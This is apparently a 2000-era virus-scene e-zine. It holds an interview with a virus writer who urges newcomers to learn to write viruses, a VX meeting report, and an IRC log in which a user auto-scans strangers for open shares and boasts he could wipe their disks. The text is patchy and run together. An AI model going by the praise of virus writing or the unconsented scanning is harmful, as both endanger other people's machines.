Yep, some of them know about it, but really few. It's bad ideas to talk about it because when u send a mail to yourfriend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...
What are your opinions on virii with destructive payloads?
I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Virusare artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, adestructive program is not really a virus. Virus must spread and spread, so why to kill the host and kill himself, in thesame time ?
How did you get involved with the Matrix virus group?
mort was a good electronic friend, some groups ask me for joining, but i was not interrested, i said it to mort, and sohe asks me to join MATRiX, this time i said "ok".
Does the Matrix group concern themselves with virus programming only or do they have an interest in otherunderground topics?
Actually MATRiX concern only virus coding, but i hope i could introduce some others subjects like phreaking, trojans,hacking, ...
Have you been a member of any other groups?
Nop, and i've never thought to be in a group, i liked to be alone; but it could be a good experience (and mort is areally good friend).
Why did you start learning to program? Was it because you wanted to write computer viruses.
i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fastlyi've learn asm, i've again to learn asm32 (i'be start). I like a lot to learn some toys or silly languages like VB, VDscript,batch, rebol, javascript,...
What other languages can you program in?
Delphi/Pascal, Asm/Asm32 for serious coding Vba/Vbs, html/wml, and some others scripting languages, for sillythings I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,...
What do you think of viruses written in languages other than assembly?
i like it! hehehe! Yes, i like all virus, worms or trojans. Some of them are really nice and ingenious but not in asm; toomuch virii are variants of a variant actually, probably cos the big number of asm source on the Net.
What is the best/favourite virus you have written so far?
Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 was great worm at this time, it was my really first, and theyhad some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' the sillysplash screen.
What groups do you value most highly?
I guess 29A is one of the most prolific and original group of the present time. Perhaps even too present.. i likedPhalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool
Which individual programmers (both past and present) do you value most highly?
Wooo, really hard to answer! But i like legend like DarkAvenger and stories like that. Bulgarian Myth is great. Thetext about it are nice novels
What zines do you read regularly?
Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too.(www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps thebests (after MATRiX zine, of course:)
What do you think of the virus scene? (Both in general and in your own country.)
I know well the vx trading scene, and there is too much politics... About vx scene, it's a cool place, but too muchyoung people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, buti'm sometimes a bit away from vx scene.
How has the underground scene changed since you first entered? Scene has changed yes, but scene changed so fastly.Guy appears, disappears,... But since the beginning i've kept some good electronic friend in vx scene, it's enough forme. (booohh Phage!;(
What do you think the future of virus writing holds?
It will depend on different things, like OS. If Linux becomes the main OS it will be a revolution for vxers, probably thescene will be totally changed. And more networks and networking application appear, more worms come too. So futureof virus is more in the hand of mass ppl than in our hands.
Do you believe in a 'perfect virus'? And if so describe it.
A Worm of course :), Joke! But i believe really that the future of the virus is in the worm properties, The nextgeneration of viral code must have abilities to infect the new hardwares (like mobil-phone) and spread using newprotocols. WAP network, GRPS and UMTS protocol will be used by phone and tiny computer, the virus will have touse worm technics to spread between phones, computers and other palm & psion. I like the idea of a AutonomousMobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find histarget and infecting files traded by network user (like pictures, ...yes my dream will be to infect .jpg :)
What advice would you give to newbies entering the virus scene?
download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet
some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages,learn about OS, learn about protocol, learn about people, learn, learn, learn, ...
What language should a newbie learn if he wants to start writing viruses?
It depends really of the newbie, learn Asm first is good to learn some universal maths/coding theories, after Asm allothers languages seems easy, hehehe. But the better thing to do is to try all, to learn again and again. All languages aregood if u know really this language, the hardest is perhaps to find THE language.
Anything you would like to add?
I guess no, lot's things have been said. And i'm not somebody very talkative (gossipy?) cya.
Any greets?
Yes a lot!!! Greets to : Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov,ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe,Roadkill,Zulu, Mist, Urgo32, me, hashish, all!
Any plugs? (Homepage, email address etc.)
Sure !mailto: [email protected]://www.delly.fr.sthttp://www.coderz.net/matrix
VX meeting 2000 in Czech Republic:Opinions of a few VXers
Interviewer: Gigabyte
First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. WhileAVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun andgiving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno,Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over thecity. If we still remember anything? I sure do! Lets see what the guys have to say..
Did you enjoy the meeting?
GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer.I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard forsome days.
Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so?
mort: sure, i met ppl who i've seen only on chat
Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It wasa great time for me. One of the best in my life...
Did there happen anything funny that you remember?
GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and wewere smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.
Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, gotabsolutely stoned and drunk, hehe.
mort: yea,... giga and beer :)
Ratter: yeah of course :) talking with you Gig XD
Anything you missed there?
GriYo: Mmmmm... no.Benny: Yeah, I expected there will come more ppl from foreign countries. nevertheless, it was really very kewlmeeting, I had really fun.
mort: more ppl
Ratter: yeah i missed darkman there. and other ppl that do VXing
How often did you have a hangover?
GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I waswrong, eh Benny? ;-))))
Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)
mort: hehe,... no comment
Ratter: I don't have hangover after weed :) and i didn't drink a lot
Kevin & Kell
Bill Holbrook
What follows is the result of a run in I had with a seriously stupidIRCop of Undernet. If you the reader doesn't know o r understand shareddrives and net.exe, This entire file will be one bo ring read for you.For the rest of us, It's funny as hell... Definatly a keeper if I do sayso myself :]
I don't have the logfile handy of my original conve rsation withchaplain, nor the Logfile earlier that day this shi t went down, becauseI don't log from work. I turned on buffer save afte r CiCi made herthreat, otherwise I wouldn't have proof of that eit her. However, I dohave some wonderful emails; and the entire log of C iCi and myselfchatting the next day. Now then, on with the show.. .
Start of #Christian buffer: Fri Sep 08 16:14:38 200 0ne.no) has joined #Christian<Latte> hello :)<TremorX> Hiya<chatcat> i need chocolate<Latte> how are u<TremorX> Great.. yourself?<chatcat> gotta go look throuhg all the chcoclate stashes i know about<chatcat> laters*** chatcat has quit IRC (*MEOW*FWACK*HISS*WHACK* "you're right... there ISN"T enough room to swing a cat in here...")*** ionxy has quit IRC (Ping timeout for ionxy[194.102.79.136])<Latte> some down, my late wife's brother passed away last nigt*** AxeAshes has quit IRC (Baltimore-R.MD.US.Undernet.Org Seattle.WA.US.UnderNet.Org)<TremorX> That's a shame... it's always hard to lose someone you're close to.<Latte> yes it is, it was cerebral haemorrhage if you understand my english<TremorX> Yeah*** AxeAshes ([email protected]) has joined #Christian<Latte> but what people tell us, they say life must go on, they said that to me when my wife passed away<TremorX> The problem with that would be trying to get your Mass Air Sensor to register properly. I suppose it COULD be done, but you'll need to add at least a small section of pipe where you can mount it, and then you run a chance of the airflow being wrong. Of course, you could always acquire another stock airbox, do some cutting, get some hosing and try it. No harm in trying, so long as your car still works if you mess up!<TremorX> --TremorX<TremorX> ack!<TremorX> sorry
<TremorX> good thing that's all that was on my clipboard :P<TremorX> j/k* TremorX drops a pin<patience_> hehe-> *lc* You think a lawyer is going to help you bro? Open shares is your problem...*** chatcat ([email protected]) has joined #Christian*** Nuts ([email protected]) has joined #Christian<JadeGA> l8r :)<TremorX> Bye hon<TremorX> *smooch*<JadeGA> see in little while ;)<TremorX> ya*** JadeGA ([email protected]) has left #Christian<ZoOrOpA> husband and wife?<TremorX> Not yet :)<TremorX> Close enuff tho*** Latte has quit IRC (Leaving)*** Latte ([email protected]) has joined #Christian*** Nuts has quit IRC (Ping timeout for Nuts[P29.ASC-MB06.QZN.SKYINET.NET])*** Nuts ([email protected]) has joined #Christian*** TremorX has quit IRC (Connection reset by Janet Reno)*** chatcat has quit IRC (Ping timeout for chatcat[kruse.fwi.com])*** Melv\Mike ([email protected]) has joined #Christian*** JnetyBabe ([email protected]) has joined #Christian<JnetyBabe> can anyone tell me where to look in the bible......<JnetyBabe> where it talks about sucide and how it makes you go to hell ?<Raid> I think if you commit suicide you'll goto hell for it, yes.<Raid> But don't quote me on it, I don't know for sure.<patience_> it doesnt talk about suicide specifically*** AxeAshes has quit IRC (<<-NE><GEN·ACiDMAX->> ©1998, KnightFal www.europa.com/~colin)<Raid> patience_: the bible seems to have a real problem with specifics...<patience_> not all the time<patience_> only a few things<Raid> a few things?<Raid> according to the bible patience, how old is this planet?<Raid> a few thousand years?<patience_> in my opinion<patience_> wel *i* think about 10000 years or so
<patience_> i'm not exactly sure<Raid> 10,000 years eh?<patience_> but theres no verse in the bible that says " the earth is so many years old"<Raid> Geological Science says she's a hell of a lot older then that.<patience_> Raid maybe a couple 1000 less<patience_> ya well <Raid> by a few million years or so.* patience_ needs food<patience_> well i dont believe that<Raid> We know alot more now then we did in the 1800s :)<Raid> Do you believe dinosaurs roamed the earth at one point?<patience_> they could very well have<patience_> cos they couldda gotten destroyed in the flood<Raid> could?<Raid> ehm.. No<Raid> they did.<ZoOrOpA> Raid:my mother in law does* patience_ cant debate because i dont have enough knowledge<ZoOrOpA> j/k<ZoOrOpA> j/k<Raid> DIdn't god claim we were the first?<patience_> you calling your motheri n law a dinosaur? lol<Raid> Well, how can we be the first on this planet, if the dinosaurs were here and long gone?<ZoOrOpA> patience_"im not married...i was trying to be funny<ZoOrOpA> ;]<Raid> adam and eve, then they furry little animals...<Raid> No mention of dinos..<Raid> Yet, we have real evidence that they existed.<pSyk_> lol<patience_> heh<Raid> like there huge skeleton remains, and the fuel I paid almost 2.00 a gallon that runs my truck.<pSyk_> Raid STX: STX don't forget, xians don't understand that carbon dating is valid.<patience_> well God didnt name every single creature He created in Genesis*** CookieMix ([email protected]) has left #Christian*** `Pegasus ([email protected]) has joined #Christian<pSyk_> maybe dinos died out after jesus was crucified.<Raid> But he did specifically say We were first right?<`Pegasus> hi a;;
<`Pegasus> hi all<patience_> hi `Pegasus @<Raid> The dinosaurs have been LONG gone.<patience_> umm<patience_> God created animals maybe first<pSyk_> yes he did.<`Pegasus> hi patience :)<pSyk_> no no<pSyk_> read the genesis<patience_> but we were around too i reckon<patience_> anyway<`Pegasus> Psyk: You still here?<pSyk_> god said he created man frist than woman than animals<Raid> patience_: What about cave men?<patience_> we all have our own opinions<Raid> patience_: You can't claim this is my opinion, Dinosaurs roamed this planet.<pSyk_> they found human remains that date 40,000 years ago...<`Pegasus> Hi zooropa!<Raid> it's a fact.<ZoOrOpA> `Pegasus :]<Raid> Fossil fuel...<patience_> well they SAY they are 40000 years old<patience_> i dont believe it<patience_> ANYWAY moving on....<pSyk_> haha<Raid> real skeletons, some complete.<Raid> patience_: Not moving on, I like this topic.<pSyk_> patience_ why not? have you researched carbon dating techniques?<Raid> and there isn't anything wrong with this topic...<Raid> it's legit.<patience_> well i've heard that they can be wrong<pSyk_> patience_ do you think you are brighter than the scientific community which relys on carbon dating?<patience_> i heard of particular incidents<patience_> pSyk_ i didnt say i was<patience_> i believe God<Raid> patience_: Where do you believe the gas you put in your car comes from?<patience_> anywho<patience_> i'm starvinh hungy*** Latte ([email protected]) has left #Christian<patience_> need some food <Raid> question too difficult to answer or something?<Nuts> eat well patience
<patience_> i just dont feel like answering em either* pSyk_ shrugs.<patience_> but its almost 10pm and i havent had supper<CiCi> Raid you're about to get your lil tail in alot of trouble from what I'm seeing<pSyk_> patience_ it's ok. there is no way you can answer that question and have faith in god at the same time.<CiCi> I suggest you stop threatening people with attacks before I remove you from Undernet<Raid> patience_: A science lesson for you. The fuel our cars run on is from rotted dino bones. Which took millions (not thousands) of years to produce.<Raid> CiCi: for?<Raid> CiCi: Ehh, Who have I threatened ?-> *CiCi* enlighten me, Whom have I threatend since I've been here?*** patience_ is now known as pataway*** dreamweb has quit IRC (Ping timeout for dreamweb[213.108.36.228])<CiCi> Raid you may only be a teenager, but you've no involved yourself in a problem with the authorities<CiCi> I'll let them handle it, but a word of advice would be to judge who you threaten more carefully<Raid> CiCi: Listen, I'm not a teenager.. and I don't think the authorities are going to do anything about me.<Raid> CiCi: But if you know something I don't, I;d like to know about it.<CiCi> Raid when you threaten to do damage to someone's computer system, and you dare them to take legal action, rest assured, they WILL do that<CiCi> and don't act like you have no clue what's going on here<CiCi> that's the end of my discussion with you, you can talk to an attorney*** CiCi ([email protected]) has left #Christian<pSyk_> wow*** RoadRunnr ([email protected]) has joined #Christian<Raid> uh huh<pSyk_> ud' think god came down and shoved a red hot poker up his bummhole*** MarySue ([email protected]) has joined #Christian<Raid> I didn't threaten him, He had a real open share on his box.*** logos3 sets mode: +o RoadRunnr<Raid> thats HIS fault, jerk
<pataway> allrighty pSyk_ *** dreamweb1 ([email protected]) has joined #Christian<pataway> i think u should leave<`Pegasus> hi Road!<RoadRunnr> hi..-> *dan_* what the fuck is with cici?*** pSyk_ was kicked by RoadRunnr (pSyk_)<pataway> hi roady*** pSyk_ ([email protected]) has joined #Christian*** RoadRunnr sets mode: +b *!*@endless.efortress.com*** pSyk_ was kicked by logos3 (Banned)<dan_> *s*<`Pegasus> thanks rr!*** Karentra ([email protected]) has joined #Christian<pataway> ta roady*** Karentra ([email protected]) has left #Christian*** RoadRunnr sets mode: -o RoadRunnr<pataway> i would ahve done the honors myself but logos well.... yah<RoadRunnr> what a way to start the day..<Raid> I don't beleive this BS...<pataway> hi MarySue !!!!* pataway willl BBL<Raid> I tell somebody they have a security problem, and I'm reported to the authorities?<MarySue> patience : ))<pataway> Raid i think she referred to what you said to LC when you were here earlier-> *cici* You want my logs of christian ? I didn't threaten your friend chap. I told him he has an open share and he's vulnerable, I did nothing to his computer.<RoadRunnr> eh?<Raid> pataway: HE has an open acccess to his computer, Ok?<pataway> anywho<pataway> she = CiCi<Raid> pataway: With that, anybody can access his hard disk.<`Pegasus> what?<RoadRunnr> Raid, are you saying what i think you are saying?*** MarySue is now known as MarySafk<ZoOrOpA> DAN!!!!!!!!!<RoadRunnr> we don't tolerate threats in here<Raid> RoadRunnr: grrrr.<Melv\Mike> MarySafk<Raid> RoadRunnr: damnit dude, listen to me. I warned chap he had an open share; I didn't DO ANYTHING TO HIM.<ZoOrOpA> dan_?<Melv\Mike> RoadRunnr: Oh yeah? what
are you going to do about it?<`Pegasus> Are you guys saying he can access my HD?<RoadRunnr> okay, lets move on then :)
<Raid> `Pegasus: If you had an open share, anybody could.<pataway> i dunno what an open share is lol<`Pegasus> Raid: what port does that use?*** Pipetobak ([email protected]) has joined #Christian<Pipetobak> Yo!<Pipetobak> !rsv lev 16 13<`Pegasus> hi<logos3> Pipetobak: Lev 16:13 "13 and put the incense on the fire before the LORD, that the cloud of the incense may cover the mercy seat which is upon the testimony, lest he {die;}" (RSV)* Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation.<Pipetobak> Peg!<`Pegasus> hi pipe<RoadRunnr> hiya Pipetobak<Pipetobak> Roadrunner!<RoadRunnr> Raid, how have you been anyhow?[`Pegasus:#Christian PING]*** ZoOrOpA ([email protected]) has left #Christian<`Pegasus> anyone?<Nuts> huh?<`Pegasus> ok :)<`Pegasus> I tought I was alone<Nuts> you're with a nut<RoadRunnr> lol<RoadRunnr> and a RR<RoadRunnr> but i am not staying<Nuts> hehe*** i8dog ([email protected]) has joined #Christian<`Pegasus> lol<Raid> RoadRunnr: Pretty good, But I'm losing my opinion of the undernet ircops intelligence.<i8dog> hello good people of CHRIST.<`Pegasus> uh oh<Raid> no offense dan ;p<`Pegasus> i8dog?<i8dog> hello
<RoadRunnr> is dan awake ?<`Pegasus> whats wrong?<`Pegasus> I see<RoadRunnr> hmm?<RoadRunnr> whats wrong?<`Pegasus> Raid: Thats not very nice to say*** MarySafk is now known as MarySue* i8dog opens the bible and starts reading.*** Kozubchik ([email protected]) has joined #Christian<RoadRunnr> lets move on from that, okay<`Pegasus> wb marysue<RoadRunnr> hiya MarySue, i8dog and Kozubchik<i8dog> hello roadrunnr.<Kozubchik> Hey Road* i8dog reads fevershly looking for answers.<MarySue> *Hugs* RoadRunnr* RoadRunnr ain't staying.. am on the expensive isp<`Pegasus> You know what guys, this place is getting too weird today. I think Im gonna come back later.<RoadRunnr> just sending some mail<`Pegasus> God Bless you all<RoadRunnr> bye pegasus !<`Pegasus> bye bye RR*** `Pegasus ([email protected]) has left #Christian*** atman` ([email protected]) has joined #Christian<i8dog> take care peg... don't let the yellow dots make your head purple.<atman`> anyone ever hear from Petrus, who used to hang out here?<MarySue> atman` !!!!!!!!!!<RoadRunnr> yeah, he still pops in * RoadRunnr double blinks.. atman?!<RoadRunnr> *logos3* petrus was last on IRC channel #christian 2 days, 18 hours, 11 minutes ago.* JnetyBabe wakes up<atman`> hi RR<i8dog> raid rules.<MarySue> atman` he's here every now and then<atman`> ah, ok, just was thinking about him :) Thanks!<Kozubchik> Pray unto God for Thumps and his Loved Ones, O holy God Pleaser St Michael the Archangel, for we all need to fervently flee unto thee, the speedy helper and intercessor for our souls.<JnetyBabe> later all...*** JnetyBabe ([email protected]) has left #Christian
<MarySue> atman` I think Colin^ talked with him a couple of days ago : )<atman`> thanks Marysue & RR<atman`> :)<MarySue> <---- is abbigail, remember me, atman`???*** atman` ([email protected]) has left #Christian<MarySue> guess he does ... lol<MarySue> ; )<RoadRunnr> lol.. wierdEnd of #Christian buffer Fri Sep 08 16:14:38 200 0
The next Day, I begin to talk to her.. Here's that log. :)I dub this, "The undernet funny"
Session Start: Fri Sep 08 23:01:35 2000Session Ident: CiCi ([email protected])>/whois ciciCiCi is [email protected] * God Can!CiCi on #christian CiCi using dallas.tx.us.undernet.org www.airmail.ne tCiCi is an IRC Operatorcici End of /WHOIS list.
<CiCi> why?<Raid> I don't think you quiet understand what you erm, reported me for. heh<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone al arm. (firewall; fixes that problem)<Raid> I told him if I was a jerk as he said, I wou ld have formatted him.<Raid> I didn't do so. hehe<Raid> I didn't "hack" him or anything.<Raid> His computer isn't setup properly.<Raid> His entire c: drive is wide open to anybody; even you.<CiCi> ok, let me go read these logs again with tha t in mind, brb<Raid> So when I'm contacted by the authorities, (t hey already know about this serious security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.<Raid> thanks.<CiCi> [13:29] (Raid): LC: So consider that a threa t, lamer.[13:29] (Raid): LC: So consider that a threat, lamer.<Raid> Are you going to use the entire log, or out of context?<Raid> I have no need to threaten CiCi. I could hav e kept my mouth shut.<Raid> then anybody (even you) could access his ent ire system.<Raid> and use it like you were sitting at the keyb oard.<Raid> I thought he might like to know about it.<Raid> Next time I find somebody has this problem.. . shrug, I'll just keep quiet. I had no idea you didn't know about this serious problem wit h windows machines.<Raid> NT suffers from it as well.<Raid> in fact, everytime you reboot; unless you ma nually set it otherwise, drive c: is shared as open, with admin rights, no password.<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to checkout this log of our chat.<Raid> I'm not bsing you.<Raid> I was trying to save you some shame is all.<Raid> (My boss thought it was funny as hell.)<CiCi> you were trying to save me from shame?<CiCi> heh<Raid> erm, embarrasment rather<Raid> it's not normal for an admin to not understa nd shared drives. ;p<Raid> and you are an administrator. hehe<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny<Raid> Admins are supposed to know these things, an d if they don't check it out first.
<Raid> Actually, he was standing beside me the enti re convo; including the one with chaplain.<CiCi> if you were trying to help, that's one thing , but you were threatening and that's not right<Raid> He didn't believe me when I told him YOU wer e an ircop of undernet.<CiCi> if you recall, you tried that same mess on m e when you first met me<Raid> I had to /whois and show him your "is an irc op" thingie.<Raid> Listen, I had access to his computer, why th reaten? Nothing he could do at that point. he was mine for the kill if I wanted it.<Raid> Instead, I told him he had a problem.<Raid> and explained (which you did take out of con text) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nu ke his fat or registry.<CiCi> why were you looking anyway?<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say.<Raid> I wasn't.<Raid> My script autoscans people on joins, much li ke undernet does for open proxies.<Raid> You might want to recommend undernet do this scan hehe<Raid> it's even more serious to a users data then an open proxy.<CiCi> uhm no<CiCi> undernet isn't a nanny service<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing me of doing something bad. I've been clean for almo st 8 months. Haven't hacked a single thing.<CiCi> the only things we look for are things that damage this network on a large scale<CiCi> the admins would NEVER agree to such scans a s yours done to all guests<Raid> if they all knew about the bug in windows, I bet you they would.<CiCi> now, I"m tired of you insulting me<Raid> I'm sure some of you ircops login with windo ws boxes.<Raid> I'm not trying to insult you.<Raid> Actually I find you one of the cooler ircops i've talked too.<Raid> I realize I may sound like a smartass; But i t's seriously not intentional.<Raid> I simply want to resolve this issue with you .<Raid> I'm not worried about the authorities.<Raid> I just don't like people thinking I've done something i didn't is all.<CiCi> you scanned someone's machine and then said<CiCi> [13:29] (Raid): LC: So consider that a threa t, lamer.<Raid> My script scanned him when he joined.<CiCi> I haven't changed my opinion of your immatur e behavior<Raid> hmmm<CiCi> if you honestly wanted to help people by doi ng this, you wouldn't call them lamers<Raid> Did you get the entire log, or just what I s aid to him?<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?<Raid> IE: the first thing he said to me?<CiCi> alot of them, but I don't<Raid> I was minding my own business, he smarted of f. I decided to tell him in open channel (I was writing /msg to him) that he had a problem.<CiCi> perhaps a lack of communication skills is th e problem, I don't now, but I do know that what you did was not good<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing.<CiCi> *shrug*<CiCi> ahhh so he "smarted off" so you thought you' d put him in his place? that's typically something a kid does<Raid> a kid?<Raid> No mam, A kid would have formatted him the s econd they were told an open share was found.<Raid> or stolen data or something.<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.<CiCi> pftt<CiCi> that was very nice of you...... not<CiCi> and that's my point<Raid> would it have been nicer not to tell him?<Raid> so somebody WITH the intention of harm could take advantage?<CiCi> would have been more civil if you hadn't tri ed to act l33t with him
<Raid> I didn't try to act l33t. <CiCi> and because you decided to show off and make a fool of someone, you made a mess<Raid> I made no such mess, A misunderstanding of w hat exactly I did made a mess.<Raid> Chaplain I bet didn't mention we go way back did he?<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one.<CiCi> alot of people can hack, most of us don't, a nd most of us are mature enough not to have a temper fit and announce a problem<CiCi> enough<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even micrsoft) for the fix for this problem.<Raid> they'll even tell you it's not a hack.<Raid> it's a bug.<CiCi> most invasions are bugs<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything.<Raid> it's no more intrusive then proxy scans. Use rs don't even notice it, and it doesn't show up as an attack on any firewalls either; becau se it isnt.<CiCi> *sigh* I'm finished with this now, you're wr ong to threaten people, end of story<Raid> ugh... Well, checkout what I said if you get a chance.<Raid> and goodnight n stuff.
From John Grahms Sat Sep 9 10:07:29 2000 Received: from [205.245.107.244] by web1610.ma il.yahoo.com; Sat, 09 Sep 2000 10:07:29 PDT Date: Sat, 9 Sep 2000 10:07:29 -0700 (PDT) From: John Grahms <[email protected]> | Block address Subject: Hello To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 9146
Add Addresses
Hi there. I thought you might like to know you haveone stupid ircop on undernet. Not only is she stupi d,but it's impossible to explain anything to her.
Her name is CiCi, and I just got klined for "hackin g".Full log follows. If you could deal with this for m e,I'd appreciate it.
Banned *@kpt-c-205-245-107-244.chartertn.net[1] unt ilSat Sep 09 05:57:09PM 2000 GMT [968522229]: this isnot a playground for you to port scan and invadeother's machines .
Heres my kline (I went out to get some food, sheklined me when I left) Heres the log of all channelactivity up to my kline.
[12:25] *** Now talking in #CHristian[12:25] -logos3- http://www.forchrist.net - channelwebsite, for rules and other info.[12:25] <Raid> mornin[12:26] *** LC([email protected]) hasjoined #CHristian[12:26] *** Txico([email protected]) Quit (Pi ngtimeout for Txico[cpt-dial-196-30-182-178.mweb.co.z a])[12:26] <CiCi> ok everyone, when Raid's in thechannel, all your machines are going to be scanned sobe prepared[12:27] * CiCi waits for Raid to meet her router th atdoesn't appreciate script kiddie probes[12:27] <Raid> CiCi: Actually, I've turned the scri ptoff.[12:28] <Raid> CiCi: I didn't want to risk having t oexplain what netbios open shares are again. ;p
And heres the wonderful log last night of us chatti ng.This is a long read, but it seriously shows littleintelligence on her part. Where did you get this la dy?
Session Start: Fri Sep 08 23:01:35 2000Session Ident: CiCi ([email protected])>/whois ciciCiCi is [email protected] * God Can!CiCi on #christian CiCi using dallas.tx.us.undernet.org www.airmail.ne tCiCi is an IRC Operatorcici End of /WHOIS list.
<CiCi> why?<Raid> I don't think you quiet understand what youerm, reported me for. heh<Raid> Mr chaplain had open shared drives. I didn't doanything to him, I told him it was there; I evendirected him to a website for zone alarm. (firewall ;fixes that problem)<Raid> I told him if I was a jerk as he said, I wou ldhave formatted him.<Raid> I didn't do so. hehe<Raid> I didn't "hack" him or anything.<Raid> His computer isn't setup properly.<Raid> His entire c: drive is wide open to anybody;even you.<CiCi> ok, let me go read these logs again with tha tin mind, brb<Raid> So when I'm contacted by the authorities, (t heyalready know about this serious security problem.. )they'll probably get a chuckle out of it. As I toldchaplain he had this problem, if I was a jerk; Iwouldn't have said a word.. just done mean things t ohim.<Raid> thanks.<CiCi> [13:29] (Raid): LC: So consider that a threa t,lamer.[13:29] (Raid): LC: So consider that a threat ,lamer.<Raid> Are you going to use the entire log, or out ofcontext?<Raid> I have no need to threaten CiCi. I could hav e
kept my mouth shut.<Raid> then anybody (even you) could access his ent iresystem.<Raid> and use it like you were sitting at thekeyboard.<Raid> I thought he might like to know about it.<Raid> Next time I find somebody has this problem.. .shrug, I'll just keep quiet. I had no idea you didn 'tknow about this serious problem with windows machin es.<Raid> NT suffers from it as well.<Raid> in fact, everytime you reboot; unless youmanually set it otherwise, drive c: is shared as op en,with admin rights, no password.<Raid> listen, if you really don't believe me, You canask anybody you trust with computer knowledge tocheckout this log of our chat.<Raid> I'm not bsing you.<Raid> I was trying to save you some shame is all.<Raid> (My boss thought it was funny as hell.)<CiCi> you were trying to save me from shame?<CiCi> heh<Raid> erm, embarrasment rather<Raid> it's not normal for an admin to not understa ndshared drives. ;p<Raid> and you are an administrator. hehe<CiCi> if your boss had a copy of your logs I don'tthink he'd think your actions were funny<Raid> Admins are supposed to know these things, an dif they don't check it out first.<Raid> Actually, he was standing beside me the enti reconvo; including the one with chaplain.<CiCi> if you were trying to help, that's one thing ,but you were threatening and that's not right<Raid> He didn't believe me when I told him YOU wer ean ircop of undernet.<CiCi> if you recall, you tried that same mess on m ewhen you first met me<Raid> I had to /whois and show him your "is an irc op"thingie.<Raid> Listen, I had access to his computer, whythreaten? Nothing he could do at that point. he wasmine for the kill if I wanted it.<Raid> Instead, I told him he had a problem.<Raid> and explained (which you did take out ofcontext) that if I was a jerk, I could easily forma t/u his hard disk, or even quicker, nuke his fat orregistry.<CiCi> why were you looking anyway?<Raid> oh and btw, I'm not a teenager; or a scriptkiddy, I don't have any reason to bs you. I'mperfectly capable of backing up what I say.<Raid> I wasn't.<Raid> My script autoscans people on joins, much li keundernet does for open proxies.<Raid> You might want to recommend undernet do thisscan hehe<Raid> it's even more serious to a users data then anopen proxy.<CiCi> uhm no<CiCi> undernet isn't a nanny service<Raid> Shrug, as I said... if you don't know aboutsomething, Check it out before accusing me of doingsomething bad. I've been clean for almost 8 months.
Haven't hacked a single thing.<CiCi> the only things we look for are things thatdamage this network on a large scale<CiCi> the admins would NEVER agree to such scans a syours done to all guests<Raid> if they all knew about the bug in windows, Ibet you they would.<CiCi> now, I"m tired of you insulting me<Raid> I'm sure some of you ircops login with windo wsboxes.<Raid> I'm not trying to insult you.<Raid> Actually I find you one of the cooler ircopsi've talked too.<Raid> I realize I may sound like a smartass; But i t'sseriously not intentional.<Raid> I simply want to resolve this issue with you .<Raid> I'm not worried about the authorities.<Raid> I just don't like people thinking I've donesomething i didn't is all.<CiCi> you scanned someone's machine and then said<CiCi> [13:29] (Raid): LC: So consider that a threa t,lamer.<Raid> My script scanned him when he joined.<CiCi> I haven't changed my opinion of your immatur ebehavior<Raid> hmmm<CiCi> if you honestly wanted to help people by doi ngthis, you wouldn't call them lamers<Raid> Did you get the entire log, or just what I s aidto him?<CiCi> do you have any clue what percentage of ourundernet guests I could call lamers?<Raid> IE: the first thing he said to me?<CiCi> alot of them, but I don't<Raid> I was minding my own business, he smarted of f.I decided to tell him in open channel (I was writin g/msg to him) that he had a problem.<CiCi> perhaps a lack of communication skills is th eproblem, I don't now, but I do know that what you d idwas not good<Raid> 